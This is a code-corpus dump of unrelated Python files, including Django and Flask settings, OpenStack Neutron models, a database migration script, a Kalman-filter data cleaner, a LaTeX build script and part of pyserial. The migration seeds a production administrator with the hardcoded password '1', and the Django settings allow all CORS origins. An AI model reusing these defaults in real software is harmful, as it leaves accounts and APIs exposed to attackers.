------------------------------------------ # # Celery # # ------------------------------------------ # CELERY_BROKER_URL = os.environ.get('REDIS_LOCATION', 'redis://127.0.0.1:6379') CELERY_RESULT_BACKEND = os.environ.get('REDIS_LOCATION', 'redis://127.0.0.1:6379') CELERY_ACCEPT_CONTENT = ['application/json'] CELERY_RESULT_SERIALIZER = 'json' CELERY_TASK_SERIALIZER = 'json' CELERY_BEAT_SCHEDULE = { 'update_rates': { 'task': 'apps.user.tasks.update_rates', 'schedule': crontab(hour="*/1"), } } # ------------------------------------------ # # Django REST Framework # # ------------------------------------------ # REST_FRAMEWORK = { 'DEFAULT_PERMISSION_CLASSES': ( 'rest_framework.permissions.IsAuthenticated', ), 'DEFAULT_AUTHENTICATION_CLASSES': ( 'rest_framework.authentication.BasicAuthentication', 'rest_framework_simplejwt.authentication.JWTAuthentication', ), 'EXCEPTION_HANDLER': 'apps.common.errors.custom_exception_handler', 'TEST_REQUEST_DEFAULT_FORMAT': 'json', } # ------------------------------------------ # # djoser # # ------------------------------------------ # DJOSER = { # Name of a field in User model to be used as login field 'LOGIN_FIELD': 'email', # If True user will be required to click activation # link sent in email after: # * creating an account # * updating their email 'SEND_ACTIVATION_EMAIL': True, 'ACTIVATION_URL': '/activate/{uid}/{token}', 'PASSWORD_RESET_CONFIRM_URL': 'password/reset/confirm/{uid}/{token}', 'USERNAME_RESET_CONFIRM_URL': 'eamil/reset/confirm/{uid}/{token}', # If True, you need to pass re_password to /users/ # endpoint, to validate password equality. 'USER_CREATE_PASSWORD_RETYPE': True, 'PASSWORD_RESET_CONFIRM_RETYPE': True, # If True, register or activation endpoint # will send confirmation email to user. 'SEND_CONFIRMATION_EMAIL': True, 'SERIALIZERS': { 'user_create': 'apps.user.serializers.UserCreateSerializer' } } # ------------------------------------------ # # Simple JWT # # ------------------------------------------ # SIMPLE_JWT = { 'ACCESS_TOKEN_LIFETIME': timedelta(minutes=5), 'REFRESH_TOKEN_LIFETIME': timedelta(days=1), 'ROTATE_REFRESH_TOKENS': True, 'AUTH_HEADER_TYPES': ('JWT',), 'USER_ID_FIELD': 'id', 'USER_ID_CLAIM': 'id', } CORS_ALLOW_ALL_ORIGINS = True
1.976563
2
app/flaskApp/config.py
jeanmarc2019/PTHacks2019-Planning
0
1878
import configparser import os dir_path = os.path.dirname(os.path.realpath(__file__)) dir_path += '/cfg.ini' class Configuration(object): def __init__(self,debug=False): section = "Flask-debug" if debug else "Flask" cfg = configparser.ConfigParser() cfg.read(dir_path if debug else "/var/www/html/flaskApp/cfg.ini") self.debug = cfg.getboolean(section, "DEBUG") self.csrf_enabled = cfg.getboolean(section,"CSRF_ENABLED") self.threads_per_page = cfg.getint(section,"THREADS_PER_PAGE") self.port = cfg.getint(section,"PORT") self.host = cfg.get(section,"HOST")
2.234375
2
neutron/db/models/l3ha.py
cleo4zheng/neutron
4
1879
<filename>neutron/db/models/l3ha.py # Copyright (C) 2014 eNov<NAME> <<EMAIL>> # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # from neutron_lib.db import model_base import sqlalchemy as sa from sqlalchemy import orm from neutron.common import constants as n_const from neutron.db.models import agent as agent_model from neutron.db import models_v2 class L3HARouterAgentPortBinding(model_base.BASEV2): """Represent agent binding state of a HA router port. A HA Router has one HA port per agent on which it is spawned. This binding table stores which port is used for a HA router by a L3 agent. """ __tablename__ = 'ha_router_agent_port_bindings' __table_args__ = ( sa.UniqueConstraint( 'router_id', 'l3_agent_id', name='uniq_ha_router_agent_port_bindings0port_id0l3_agent_id'), model_base.BASEV2.__table_args__ ) port_id = sa.Column(sa.String(36), sa.ForeignKey('ports.id', ondelete='CASCADE'), nullable=False, primary_key=True) port = orm.relationship(models_v2.Port) router_id = sa.Column(sa.String(36), sa.ForeignKey('routers.id', ondelete='CASCADE'), nullable=False) l3_agent_id = sa.Column(sa.String(36), sa.ForeignKey("agents.id", ondelete='CASCADE')) agent = orm.relationship(agent_model.Agent) state = sa.Column(sa.Enum(n_const.HA_ROUTER_STATE_ACTIVE, n_const.HA_ROUTER_STATE_STANDBY, name='l3_ha_states'), default=n_const.HA_ROUTER_STATE_STANDBY, server_default=n_const.HA_ROUTER_STATE_STANDBY) class L3HARouterNetwork(model_base.BASEV2, model_base.HasProjectPrimaryKey): """Host HA network for a tenant. One HA Network is used per tenant, all HA router ports are created on this network. """ __tablename__ = 'ha_router_networks' network_id = sa.Column(sa.String(36), sa.ForeignKey('networks.id', ondelete="CASCADE"), nullable=False, primary_key=True) network = orm.relationship(models_v2.Network) class L3HARouterVRIdAllocation(model_base.BASEV2): """VRID allocation per HA network. Keep a track of the VRID allocations per HA network. """ __tablename__ = 'ha_router_vrid_allocations' network_id = sa.Column(sa.String(36), sa.ForeignKey('networks.id', ondelete="CASCADE"), nullable=False, primary_key=True) vr_id = sa.Column(sa.Integer(), nullable=False, primary_key=True)
1.789063
2
authentication/migrate.py
anae09/electionWebService
0
1880
<reponame>anae09/electionWebService from flask import Flask; from configuration import Configuration; from flask_migrate import Migrate, init, migrate, upgrade; from models import database, Role, UserRole, User; from sqlalchemy_utils import database_exists, create_database; application = Flask(__name__); application.config.from_object(Configuration); migrateObject = Migrate(application, database); done = False; while not done: try: if not database_exists(application.config["SQLALCHEMY_DATABASE_URI"]): create_database(application.config["SQLALCHEMY_DATABASE_URI"]); database.init_app(application); with application.app_context() as context: init(); migrate(message="Production migration"); upgrade(); adminRole = Role(name="administrator"); userRole = Role(name="user"); database.session.add(adminRole); database.session.add(userRole); database.session.commit(); admin = User( jmbg="0000000000000", forename="admin", surname="admin", email="<EMAIL>", password="1" ); database.session.add(admin); database.session.commit(); userRole = UserRole( userId=admin.id, roleId=adminRole.id ); database.session.add(userRole); database.session.commit(); done = True; except Exception as err: print(err);
2.078125
2
output/ensemble_analysis.py
gitter-lab/pria-ams-enamine
1
1881
<filename>output/ensemble_analysis.py from __future__ import print_function import os import json import numpy as np def extract(file_path): if not os.path.isfile(file_path): return -1, -1, -1 with open(file_path, 'r') as f: lines = f.readlines() test_roc, test_precision, test_NEF = -1, -1, -1 for line in lines: if 'test precision' in line: line = line.strip().split(':') test_precision = float(line[1]) if 'test roc' in line: line = line.strip().split(':') test_roc = float(line[1]) if 'ratio: 0.01, NEF:' in line: line = line.strip().replace('NEF:', '').split(',') test_NEF = float(line[1]) return test_roc, test_precision, test_NEF if __name__ == '__main__': model_list = [ 'random_forest_classification', 'xgboost_classification', 'xgboost_regression', 'single_deep_classification', 'single_deep_regression' ] model_process_num_list = { 'random_forest_classification': [139, 69, 111, 212, 210, 148, 28, 61, 124, 130, 131, 141, 14, 38, 165, 65, 123, 94, 3, 88, 72], 'xgboost_classification': [140, 967, 960, 807, 263, 694, 440, 47, 116, 792, 663, 32, 564, 950, 735, 84, 364, 605, 431, 55, 388], 'xgboost_regression': [187, 6, 514, 507, 880, 440, 605, 718, 754, 409, 586, 214, 753, 65, 294, 911, 721, 81, 321, 545, 280], 'single_deep_classification': [356, 404, 215, 93, 254, 88, 423, 47, 363, 132, 5, 385, 370, 29, 415, 54, 124, 183, 180, 416], 'single_deep_regression': [199, 323, 114, 123, 47, 175, 17, 178, 106, 265, 67, 157, 369, 115, 191, 20, 27, 108, 270, 45], 'ensemble': [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12] } for model in model_list: print('Model: {}'.format(model)) number = len(model_process_num_list[model]) hyper_parameter_result_roc = [] hyper_parameter_result_precision = [] hyper_parameter_result_NEF = [] for running_process in model_process_num_list[model]: test_roc_list, test_precision_list, test_NEF_list = [], [], [] for idx in range(4): file_path = '{}/{}_{}_{}.out'.format(model, model, running_process, idx) test_roc, test_precision, test_NEF = extract(file_path) if test_roc == -1 and test_precision == -1: print('missing index: {}'.format(running_process)) if test_roc != -1: test_roc_list.append(test_roc) if test_precision != -1: test_precision_list.append(test_precision) if test_NEF != -1: test_NEF_list.append(test_NEF) hyper_parameter_result_roc.append(np.mean(test_roc_list)) hyper_parameter_result_precision.append(np.mean(test_precision_list)) hyper_parameter_result_NEF.append(np.mean(test_NEF_list)) for running_process, roc, pr, NEF in zip(model_process_num_list[model], hyper_parameter_result_roc, hyper_parameter_result_precision, hyper_parameter_result_NEF): print('{}\t{}\t{}\t{}'.format(running_process, roc, pr, NEF)) print() print('On The Last Folder') model_list = [ 'random_forest_classification', 'xgboost_classification', 'xgboost_regression', 'single_deep_classification', 'single_deep_regression', 'ensemble' ] for model in model_list: print('Model: {}'.format(model)) number = len(model_process_num_list[model]) for running_process in model_process_num_list[model]: if model == 'ensemble': file_path = '{}/{}.out'.format(model, running_process) else: file_path = '{}/{}_{}_4.out'.format(model, model, running_process) test_roc, test_precision, test_NEF = extract(file_path) print('{}\t{}'.format(running_process, test_NEF)) print()
2.671875
3
openstack_dashboard/test/integration_tests/regions/messages.py
ankur-gupta91/block_storage
1
1882
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from selenium.common.exceptions import NoSuchElementException from selenium.webdriver.common import by from openstack_dashboard.test.integration_tests.regions import baseregion ERROR = 'alert-danger' INFO = 'alert-info' SUCCESS = 'alert-success' class MessageRegion(baseregion.BaseRegion): _close_locator = (by.By.CSS_SELECTOR, 'a.close') def _msg_locator(self, level): return (by.By.CSS_SELECTOR, 'div.alert.%s' % level) def __init__(self, driver, conf, level=SUCCESS): self._default_src_locator = self._msg_locator(level) # NOTE(tsufiev): we cannot use self._turn_off_implicit_wait() at this # point, because the instance is not initialized by ancestor's __init__ driver.implicitly_wait(0) try: super(MessageRegion, self).__init__(driver, conf) except NoSuchElementException: self.src_elem = None finally: self._turn_on_implicit_wait() def exists(self): return self._is_element_displayed(self.src_elem) def close(self): self._get_element(*self._close_locator).click()
1.9375
2
model_input.py
bgarbin/GUIDE
0
1883
<reponame>bgarbin/GUIDE # -*- coding: utf-8 -*- import numpy as np #import cmath as cm # Main parameters for window # 'record_every': number of time_steps one between two consecutive record events window_params = {'kernel': 'RK4','nstep_update_plot': 100, 'step_size': 0.01, 'array_size': 10000, 'streaming': True, 'record_state':False, 'nstep_record':1, 'window_size':(1200,1000), 'invert_order_obs_var': True,'theme':'dark'} # Definition of the plot configuration def load_docks(): ''' Returns a dict to be used for plots declaration. Here, we use pyqtgraph docks. Each plot has a dictionnary as "value" with keys: "type" (accepted values: 'plot' and 'image'), "zoomOf" (key name of another dock), "position" (accepted values: 'bottom', 'top', 'left', 'right', 'above', or 'below'), "relativeTo" (optional, key name of another dock; position relative to another dock), size [(xlength,ylength); note that lengths arguments are only a suggestion; docks will still have to fill the entire dock area and obey the limits of their internal widgets], "labels" (dict of position:str), "title" (str). ''' docks = { 'plot1' : {'type': 'plot1D' , 'position': 'left' , 'size': (500,500), 'labels':{'bottom':'Time (arb. units)','left':'Intensity (arb. units)'}}, 'phase_space' : {'type': 'plot2D', 'position': 'right', 'size': (300,300)}, 'plot2' : {'type': 'plot1D' , 'zoomOf': 'plot1' , 'position': 'bottom', 'relativeTo': 'phase_space', 'size': (300,100)}, 'plot3' : {'type': 'plot1D', 'position': 'top','relativeTo':'phase_space', 'size': (300,300)}, 'custom_name' : {'type': 'image', 'position': 'above','relativeTo':'plot3', 'size': (300,300)}, } return docks def load_variables(): ''' Returns a dict of the variables. Each variable is a dict with keys: "type" (e.g. np.float64, np.complex128), "init_cond" (type), "plot" (bool, optional default is True), "dock" (list of key name(s) of docks [str] as defined in load_dock function; optional; if not provided, will be ploted on every plot), "equation" (callable, optional default is diff_eq_{variable_name}), "help" (str, to be displayed in help message). Additionnal keys are added internally: "value", "observable" (False), "lineedit", "checkbox". ''' variables = { 'A' : {'type': np.complex128, 'init_cond': 0., 'plot': False, 'dock':['plot1','plot2'], 'help':'field in the first cavity'}, 'B' : {'type': np.complex128, 'init_cond': 0.001, 'plot': False, 'equation': diff_eq_B} } return variables def load_observables(): ''' Returns a dict of the observables. Similar to variables, observables are added internally to the dictionnary of variables. Each observable is a dict with keys: "type" (e.g. np.float64, np.complex128), "init_cond" (type), "plot" (bool, optional default is True), "dock" (list of key name(s) of docks [str] as defined in load_dock function; optional; if not provided, will be ploted on every plot), "equation" (callable, optional default is eq_{variable_name}), "calculation_size" (bool, whether you want according variable to be only the size of what calculation returns; WARNING: those items won't be stored), "help" (str, to be displayed in help message). Additionnal keys are added internally: "value", "observable" (True), "lineedit", "checkbox". ''' observables = { 'mod_A' : {'type': np.float64, 'init_cond': 0., 'plot': True, 'dock':['plot1','plot2'], 'help':'modulus square of A'}, 'mod_B' : {'type': np.float64, 'init_cond': 0., 'dock':['plot1','plot2','plot3']}, 'mod_A_2' : {'type': np.float64, 'init_cond': 0., 'plot': True, 'dock':[{'phase_space':['mod_A_2','mod_B_2']}],'calculation_size':True, 'help':'abs(A)**2 shorter to be plotted in phase space'}, 'mod_B_2' : {'type': np.float64, 'init_cond': 0. ,'dock':[{'phase_space':['mod_B_2','mod_A_2']}],'calculation_size':True}, 'mod_A_2D' : {'type': np.float64, 'init_cond': 0. ,'dock':['custom_name'],'calculation_size':True,'help':'variable to be used plotted in image'}, #'ph_A' : {'type': np.float64, 'init_cond': 0., 'dock':['plot3']}, #'ph_B' : {'type': np.float64, 'init_cond': 0., 'dock':['plot3']} } return observables def load_params(): ''' Returns a dict of the parameters. Similarly to variables/observables, each parameter has a dictionnary as "value" with keys: "init_cond" (float), "min" (float), "max" (float), step (float or int; WARNING if int this parameter will be an integer), "help" (str, to be displayed in help message). Additionnal keys are added internally: "value", "spinbox", "slider", "slider_conversion_factor". ''' params = {} params['delta'] = {'init_cond': -8., 'min': -10., 'max': 10., 'step': 0.01, 'help':'detuning parameter'} params['f'] = {'init_cond': 4.8, 'min': 0. , 'max': 20., 'step': 0.01} params['kappa'] = {'init_cond': 2.8, 'min': 0. , 'max': 10., 'step': 0.01} params['gamma'] = {'init_cond': 0. , 'min': -1. , 'max': 1., 'step': 0.01} params['tau'] = {'init_cond': 1. , 'min': 0. , 'max': 10., 'step': 0.01} params['npts_PS'] = {'init_cond': 1000 , 'min': 1 , 'max': 2000, 'step': 1} params['folding'] = {'init_cond': 100 , 'min': 1 , 'max': 1000, 'step': 1} params['min_scan'] = {'init_cond': 0, 'min': 0., 'max': 500., 'step': 0.01, 'help':'detuning parameter'} params['max_scan'] = {'init_cond': 10, 'min': 0., 'max': 500., 'step': 0.01, 'help':'detuning parameter'} params['step_scan'] = {'init_cond': 0.05, 'min': 0.001, 'max': 10., 'step': 0.001, 'help':'detuning parameter'} params['nstep_scan'] = {'init_cond': 50, 'min': 0, 'max': 500, 'step': 1, 'help':'detuning parameter'} return params # BEGIN Declaration of the equations. Automatically recognized pattern are "diff_eq_{variable}" (variables) and "eq_{observable}" (observables); with a name after the pattern that must match the variable/observable's one. Alternatively, you may use custom equation names. You should declare it in the variable/observable dictionnary with keyword "equation". def diff_eq_A(ui,variables, params): return 1j*(params['delta']*params['tau'] + abs(variables['A'])**2)*variables['A'] - variables['A'] + (1j*params['kappa'] + params['gamma'])*params['tau']*variables['B'] + params['f'] def diff_eq_B(ui,variables, params): return 1j*(params['delta']*params['tau'] + abs(variables['B'])**2)*variables['B'] - variables['B'] + (1j*params['kappa'] + params['gamma'])*params['tau']*variables['A'] + params['f'] def eq_mod_A(ui,variables,params): return abs(variables['A'])**2 def eq_mod_B(ui,variables,params): return abs(variables['B'])**2 def eq_mod_A_2(ui,variables,params): return variables['mod_A'][-params['npts_PS']:] def eq_mod_B_2(ui,variables,params): return variables['mod_B'][-params['npts_PS']:] def eq_mod_A_2D(ui,variables,params): folding = params['folding'] nb_rt = int(len(variables['mod_A'])/params['folding']) return np.reshape(variables['mod_A'][-(folding*nb_rt):],(nb_rt,folding)) #def eq_ph_A(variables,params): #return [cm.phase(temp) for temp in variables['A']] #np.array(np.arctan2(np.imag(variables['A']), np.real(variables['A']))) #def eq_ph_B(variables,params): #return [cm.phase(temp) for temp in variables['B']] def keyboard_keys(): """ Returns a dictionnary of user defined keys of form key:callable. System reserved keys: [" ", "q", "h", "s", "r", "i", "c"]. This must return an empty dict if no extra keys. """ keys = { 't': ramp_f, } return keys #return {} def ramp_f(ui,variables,params): print('begin scanning') for f in np.concatenate((np.arange(params['min_scan'],params['max_scan']+params['step_scan'],params['step_scan']),np.arange(params['max_scan'],params['min_scan']-params['step_scan'],-params['step_scan']))): f = round(f,2) ui.set_param('f',f) ui.run_simulator(params['nstep_scan']) print('end scanning') def kernel_my_own(variables,params): ''' Takes as arguments dicts of variables and params as {'key':value}. Returns a dict of the results with the same form. For now the function name must start with "kernel_" ''' pass
2.484375
2
input/EnvEq/pairwise/Tneg-Tpro/u_lim_o2Tpro-u_lim_o2Tneg/parallelizer.py
Harshavardhan-BV/Cancer-compe-strat
1
1884
from multiprocessing import Pool import EnvEq as ee import numpy as np import itertools as it import os #parsing input into numpy arrays from input import * y0=np.array([y0_Tpos,y0_Tpro,y0_Tneg,y0_o2,y0_test]) p=np.array([p_o2,p_test]) mu=np.array([[mu_o2Tpos,mu_o2Tpro,mu_o2Tneg],[mu_testTpos,mu_testTpro,0]]) lam=np.array([lam_o2,lam_test]) t_D=np.array([t_DTpos,t_DTpro,t_DTneg]) r=np.array([r_Tpos,r_Tpro,r_Tneg]) delta=np.array([delta_Tpos,delta_Tpro,delta_Tneg]) rho=np.array([rho_Tpos,rho_Tpro,rho_Tneg]) lim=np.array([[[l_lim_o2Tpos,u_lim_o2Tpos],[l_lim_o2Tpro,u_lim_o2Tpro],[l_lim_o2Tneg,u_lim_o2Tneg]],[[l_lim_testTpos,u_lim_testTpos],[l_lim_testTpro,u_lim_testTpro],[0,0]]],dtype=np.float64) #make directories for saving raw_outputs try: os.makedirs("../../raw_output/EnvEq/"+f_name) except: pass #iterator over these o2_lim_arr=np.empty([0,2]) for ulim_Tpro in np.arange(0.1,1,0.2): for ulim_Tneg in np.arange(0.1,1,0.2): o2_lim_arr=np.append(o2_lim_arr,[[ulim_Tpro,ulim_Tneg]],axis=0) def solve_parm(u_lim_o2): #calls the solve_eq function with all default inputs other than o2_lim f_name_i=f_name+"{:.1f}".format(u_lim_o2[0])+"-"+"{:.1f}".format(u_lim_o2[1]) lim[0,1,1]=u_lim_o2[0] lim[0,2,1]=u_lim_o2[1] ee.solve_eq(t_max,dt,y0,p,mu,lam,r,K,delta,rho,lim,f_name_i) if __name__ == '__main__': pool = Pool(4) pool.map(solve_parm,o2_lim_arr) #iterate over the o2_lims pool.close() pool.join()
2.1875
2
task1_makeTrainingDataset.py
1985312383/contest
2
1885
<filename>task1_makeTrainingDataset.py import csv import re import numpy as np thre = 1.5 # 要调整的参数,这个是阈值 iteration_num = 2 # 要调整的参数,这个是迭代次数 def KalmanFilter(z, n_iter=20): # 卡尔曼滤波 # 这里是假设A=1,H=1的情况 # intial parameters sz = (n_iter,) # size of array # Q = 1e-5 # process variance Q = 1e-6 # process variance # allocate space for arrays xhat = np.zeros(sz) # a posteri estimate of x P = np.zeros(sz) # a posteri error estimate xhatminus = np.zeros(sz) # a priori estimate of x Pminus = np.zeros(sz) # a priori error estimate K = np.zeros(sz) # gain or blending factor R = 0.015 ** 2 # estimate of measurement variance, change to see effect # intial guesses xhat[0] = 0.0 P[0] = 1.0 A = 1 H = 1 for k in range(1, n_iter): # time update xhatminus[k] = A * xhat[k - 1] # X(k|k-1) = AX(k-1|k-1) + BU(k) + W(k),A=1,BU(k) = 0 Pminus[k] = A * P[k - 1] + Q # P(k|k-1) = AP(k-1|k-1)A' + Q(k) ,A=1 # measurement update K[k] = Pminus[k] / (Pminus[k] + R) # Kg(k)=P(k|k-1)H'/[HP(k|k-1)H' + R],H=1 xhat[k] = xhatminus[k] + K[k] * (z[k] - H * xhatminus[k]) # X(k|k) = X(k|k-1) + Kg(k)[Z(k) - HX(k|k-1)], H=1 P[k] = (1 - K[k] * H) * Pminus[k] # P(k|k) = (1 - Kg(k)H)P(k|k-1), H=1 return xhat def data_process(file_path: str): with open(file_path, "r") as f: # 打开文件 f.readline() # 去掉第一行 data = f.readlines() # 读取文件 data_num = len(data) / 4 if int(data_num) - data_num < -0.1: raise ValueError("数据数量不对!") initial_time = re.search(":.*:([0-9]*)", data[0], flags=0) # 获取初始数据序列 initial_time = int(initial_time.group(1)) Measures = [] for i in range(int(data_num)): measure = [] for j in range(4): device = [] anchor = re.search(":[0-9]*?:RR:0:([0-9]):[0-9]*?:([0-9]*?):[0-9]*?:([0-9]*)", data[4 * i + j], flags=0) device.extend([int(anchor.group(3)) - initial_time, anchor.group(1), anchor.group(2)]) # 获取数据序号、设备号、测量值 device = list(map(int, device)) measure.append(device) # 一个measure就是四个设备拿到的四份数据 Measures.append(measure) Measures = np.array(Measures) # Measures是三维数组是获取的所有测量数据 normalized_device_data = [] normalized_device_data_x = [] device_data = [] device_data_x = [] for i in range(4): device_data.append(Measures[:, i, 2]) device_data_x.append(np.arange(len(Measures[:, i, 2]))) normalized_device_data.append(device_data[i] / np.max(Measures[:, i, 2])) # 最大值归一化 normalized_device_data_x = device_data_x normalized_device_data = np.array(normalized_device_data) normalized_device_data_x = np.array(normalized_device_data_x) device_data = np.array(device_data) device_data_x = np.array(device_data_x) processed_device_data = np.array(device_data).copy() device_mean = np.mean(device_data, axis=1) device_std = np.std(device_data, axis=1) low_thre = device_mean - device_std * thre # 去除离群点 high_thre = device_mean + device_std * thre # 去除离群点 for _ in range(iteration_num): for i in range(4): for j in range(len(device_data[i, :])): if device_data[i, j] < low_thre[i] or device_data[i, j] > high_thre[i]: processed_device_data[i, j] = device_mean[i] xhat = [] for i in range(4): # raw_data = device_data[i] raw_data = processed_device_data[i] xhat.append(KalmanFilter(raw_data, n_iter=len(raw_data))) xhat = np.array(xhat) xhat = np.around(xhat, 1) # 将滤波后的四组坐标值,保留一位小数 return device_data, xhat # device_data为原始数据,xhat是离群点去除且卡尔曼滤波后的数据 def save_data(file_path: str, Measures): with open(file_path, "w+", newline="") as datacsv: # dialect为打开csv文件的方式,默认是excel,delimiter="\t"参数指写入的时候的分隔符 csvwriter = csv.writer(datacsv, dialect=("excel")) # csv文件插入一行数据,把下面列表中的每一项放入一个单元格(可以用循环插入多行) csvwriter.writerow(["Number", "A0", "A1", "A2", "A3"]) csvwriter.writerows(np.column_stack((np.arange(Measures.shape[1]), Measures.T)), ) def collect_dataset(kind): for i in range(1, 325): file_path = f"./data/附件1:UWB数据集/{kind}数据/{i}.{kind}.txt" original_data, final_processed_data = data_process(file_path) save_data(f"cleaned_data/{kind}数据/{i}.{kind}.csv", final_processed_data) def collect_labels(): pass if __name__ == '__main__': collect_dataset("正常") collect_dataset("异常")
3.078125
3
checkmate/contrib/plugins/all/progpilot/setup.py
marcinguy/checkmate-ce
0
1886
<reponame>marcinguy/checkmate-ce<gh_stars>0 from .analyzer import ProgpilotAnalyzer from .issues_data import issues_data analyzers = { 'phpanlyzer' : { 'name' : 'phpanalyzer', 'title' : 'phpanalyzer', 'class' : ProgpilotAnalyzer, 'language' : 'all', 'issues_data' : issues_data, }, }
1.507813
2
genlist.py
truckli/technotes
0
1887
<reponame>truckli/technotes #!/usr/bin/env python import shutil, re, os, sys file_model = "Model.template" bookname = "TechNotes" file_bibtex = "thebib.bib" folder_target = "../pdf/" #if name is a chapter, return its sections def get_sections(name): if not os.path.isdir(name): return [] files = os.listdir(name) sections = [] for section in files: if re.match('.*\.tex$', section) and not re.match(".*lmz0610.*", section): sections.append(name + "/" + section) return sections def is_updated(pdffile, texfiles): def depend_modified(fname, ims): depend_mtime = os.path.getmtime(fname) if depend_mtime > ims: print pdffile, ' mtime: ',ims print fname, ' mtime: ', depend_mtime return True return False old_pdffile = folder_target + pdffile if not os.path.isfile(old_pdffile): return False pdf_mtime = os.path.getmtime(old_pdffile) #if depend_modified(sys.argv[0], pdf_mtime): #return False #if depend_modified(file_model, pdf_mtime): #return False for section in texfiles: if depend_modified(section, pdf_mtime): return False return True def remove_tmp(tmpname): if os.path.isfile(tmpname): os.remove(tmpname) def remove_latex_tmps(texname): remove_tmp(texname + ".pdf") remove_tmp(texname + ".tex") remove_tmp(texname + ".blg") remove_tmp(texname + ".bbl") remove_tmp(texname + ".out") remove_tmp(texname + ".toc") remove_tmp(texname + ".aux") remove_tmp(texname + ".idx") remove_tmp(texname + ".log") remove_tmp(texname + ".lof") remove_tmp(texname + ".lot") def read_bbl_file(object_name): file_bbl = object_name + ".bbl" if not os.path.isfile(file_bbl): return "" with open(file_bbl, 'r') as f: return f.read() #if depend_files contains citation def need_bibtex(object_name, depend_files): #if a file contains latex citation command \cite{} def contain_citation(section_name): with open(section_name, "r") as f: content_section = f.read() if content_section.find("\\cite{") == -1: return False return True for section in depend_files: if contain_citation(section): return True return False def gen_pdf(object_name): object_pdf = object_name + ".pdf" if object_name == bookname: depend_files = book_sections targets = [folder_target + object_pdf, folder_target + "AAAAAAAAAAA.pdf"] chapter_start_counter = 0 else: depend_files = chap_sections[object_name] targets = [folder_target + object_pdf] chapter_start_counter = book_chapters.index(object_name) # if is_updated(object_pdf, depend_files): # print(object_pdf + " is updated") # return False obj_need_bibtex = need_bibtex(object_name, depend_files) model = '' with open(file_model) as model_file: model = model_file.read() model = model.replace("OBJECTNAME", object_name) if object_name == 'Report': model = model.replace("CHAPTERSTART", "0") model = model.replace("\\tableofcontents", "%\\tableofcontents") model = model.replace("ctexrep", "ctexart") model = model.replace("\\setcounter{chapter}", "%\\setcounter{chapter}") else: model = model.replace("CHAPTERSTART", str(chapter_start_counter)) insert_word = "TOADD" insert_pos = model.find(insert_word) latex_text = model[:insert_pos] + insert_word for section in depend_files: latex_text = latex_text + "\n\\input{"+ section + "}" #prepend text encoding mode line section_text = "" with open(section, 'r') as f: line = f.readline() if line[:6] != '%!Mode': section_text = '%!Mode:: "TeX:UTF-8"\n' + line + f.read() if section_text != "": with open(section, 'w') as f: f.write(section_text) if obj_need_bibtex: latex_text = latex_text + "\n\n" latex_text = latex_text + "\\bibliographystyle{unsrt}\n" latex_text = latex_text + "\\bibliography{thebib}\n" latex_text = latex_text + model[insert_pos+len(insert_word):] object_tex = object_name + ".tex" with open(object_tex, "w") as f: f.write(latex_text) # os.system("xelatex " + object_name) # if len(sys.argv) < 3 or sys.argv[2] != "fast": # if obj_need_bibtex: # old_bbl = read_bbl_file(object_name) # os.system("bibtex " + object_name) # if old_bbl != read_bbl_file(object_name): # os.system("xelatex " + object_name) # os.system("xelatex " + object_name) # # if os.path.isfile(object_pdf): # for target in targets: # shutil.copy(object_pdf, target) return True #trim trailing slash def trim_chap_name(name): if name[len(name) - 1] == '/': name = name[:len(name)-1] return name def merge_chapter_pdfs(): mergecmd = 'pdftk ' for chap in book_chapters: chappdf = folder_target + chap + '.pdf' if os.path.isfile(chappdf): mergecmd += chappdf + ' ' mergecmd += 'cat output ' + folder_target + 'AAABBBBBBBB.pdf' print mergecmd os.system(mergecmd) ################################################## #now work starts files = os.listdir('.') chap_sections = {} book_sections = [] book_chapters = [] for chap in files: sections = get_sections(chap) if len(sections): chap_sections[chap] = sections book_sections.extend(sections) book_chapters.append(chap) cmd = "one" if cmd == "one": gen_pdf(bookname) elif cmd == "all": modified = False for chap in chap_sections: modified = gen_pdf(chap) or modified if modified: merge_chapter_pdfs() elif cmd == "clean": for chap in chap_sections: remove_latex_tmps(chap) remove_latex_tmps(bookname) else: chap = trim_chap_name(cmd) if chap in book_sections: #chap is actually a section section = chap chap = 'Report' chap_sections[chap] = [section] book_chapters.append(chap) if not chap_sections.has_key(chap): print(chap + " is not a valid chapter name") sys.exit(1) modified = gen_pdf(chap) if modified and chap != 'Report': merge_chapter_pdfs()
2.328125
2
editing files/Portable Python 3.2.5.1/App/Lib/site-packages/serial/serialposix.py
mattl1598/testing
0
1888
#!/usr/bin/env python # # Python Serial Port Extension for Win32, Linux, BSD, Jython # module for serial IO for POSIX compatible systems, like Linux # see __init__.py # # (C) 2001-2010 <NAME> <<EMAIL>> # this is distributed under a free software license, see license.txt # # parts based on code from <NAME> <<EMAIL>>: # ftp://ftp.visi.com/users/grante/python/PosixSerial.py # # references: http://www.easysw.com/~mike/serial/serial.html import sys, os, fcntl, termios, struct, select, errno, time from .serialutil import * # Do check the Python version as some constants have moved. if (sys.hexversion < 0x020100f0): import TERMIOS else: TERMIOS = termios if (sys.hexversion < 0x020200f0): import FCNTL else: FCNTL = fcntl # try to detect the OS so that a device can be selected... # this code block should supply a device() and set_special_baudrate() function # for the platform plat = sys.platform.lower() if plat[:5] == 'linux': # Linux (confirmed) def device(port): return '/dev/ttyS%d' % port ASYNC_SPD_MASK = 0x1030 ASYNC_SPD_CUST = 0x0030 def set_special_baudrate(port, baudrate): import array buf = array.array('i', [0] * 32) # get serial_struct FCNTL.ioctl(port.fd, TERMIOS.TIOCGSERIAL, buf) # set custom divisor buf[6] = buf[7] / baudrate # update flags buf[4] &= ~ASYNC_SPD_MASK buf[4] |= ASYNC_SPD_CUST # set serial_struct try: res = FCNTL.ioctl(port.fd, TERMIOS.TIOCSSERIAL, buf) except IOError: raise ValueError('Failed to set custom baud rate: %r' % baudrate) baudrate_constants = { 0: 0000000, # hang up 50: 0o000001, 75: 0o000002, 110: 0o000003, 134: 0o000004, 